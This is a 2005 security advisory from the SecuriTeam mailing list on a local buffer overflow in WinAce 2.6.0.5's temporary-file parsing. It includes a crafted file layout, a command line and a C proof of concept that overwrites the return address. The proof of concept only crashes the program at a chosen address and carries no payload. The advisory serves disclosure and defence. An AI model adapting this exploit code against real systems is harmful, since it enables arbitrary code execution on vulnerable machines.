The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
WinAce Temporary File Handling Buffer Overflow
------------------------------------------------------------------------
SUMMARY
" <http://www.winace.com/winace.html> WinAce is an archiving utility with
an easy-to-use interface for creating, extracting, and viewing archives."
Local exploitation of a buffer overflow vulnerability in WinAce allows
attackers to execute arbitrary code.
DETAILS
Vulnerable Systems:
* WinAce version 2.6.0.5 (earlier versions suspected)
When WinAce attempts to compress any file, firstly it creates temporary
file which contains the location of the file which will be compressed. The
problem specifically exists when parsing temporary files that contain long
file entries.
An example malicious .tmp file with a long file name:
c:\AAAAAAAAA...[A x 2021 bytes is where the EIP
starts]1234[AAAA...AAAAA]\r\n
Command line:
"C:\Program Files\WinAce\winace.exe" a "C:\Program
Files\WinAce\winace" @c:\crafted.tmp
'[A x 2021]' represents any string of 2021 bytes in length. Opening either
malicious tmp file on the Microsoft Windows platform will cause WinAce to
crash with an access violation when attempting to execute instruction
0x34333231, which is the little-endian ASCII code representation of
'1234'. An attacker can exploit this vulnerability to redirect the flow of
control and eventually execute arbitrary code. This example is specific to
the Microsoft Windows platform.
Exploitation requires that an attacker to execute arbitrary command line
which contain location of malicious tmp file.
Disclosure Timeline:
22.07.05 - Initial vendor notification
25.07.05 - Initial vendor response
19.08.05 - Public disclosure
Proof of concept:
/*
*
* WinAce Temporary File Parsing Buffer Overflow Vulnerability
* http://www.winace.com/winace.html
* Discovered & Coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan
*
*/
/*
*
* Tested with WinAce 2.6.0.5 as installed on the Win XP Sp2 En platform
*
*/
#include <windows.h>
#include <stdio.h>
void main()
{
// create crafted command line
char tmpfile[] = "c:\\crafted.tmp";
char winacepath[] = "\"C:\\Program Files\\WinAce\\winace.exe\"";
char compresspar[] = " a \"C:\\Program Files\\WinAce\\winace\" @";
char runpar[300];
int i = 0;
char Ret_Addr[]= "\x31\x32\x33\x34";
strcpy(runpar,winacepath);
strcat(runpar,compresspar);
strcat(runpar,tmpfile);
// create crafted .tmp file
FILE *di;
if( (di=fopen(tmpfile,"wb")) == NULL ){
return;
}
fprintf(di,"c:\\");
for(i=0;i<2013;i++)
fputc(0x41,di);
// Overwriting the return address (EIP)
fprintf(di,Ret_Addr); //EIP
for(i=0;i<178;i++)
fputc(0x41,di);
// end of file
fprintf(di,"\x2E\x74\x78\x74\x0D\x0A");
fclose(di);
WinExec(runpar,SW_SHOW);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:atmaca@icqmail.com> ATmaCA.
The original article can be found at: <http://www.atmacasoft.com>
http://www.atmacasoft.com
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
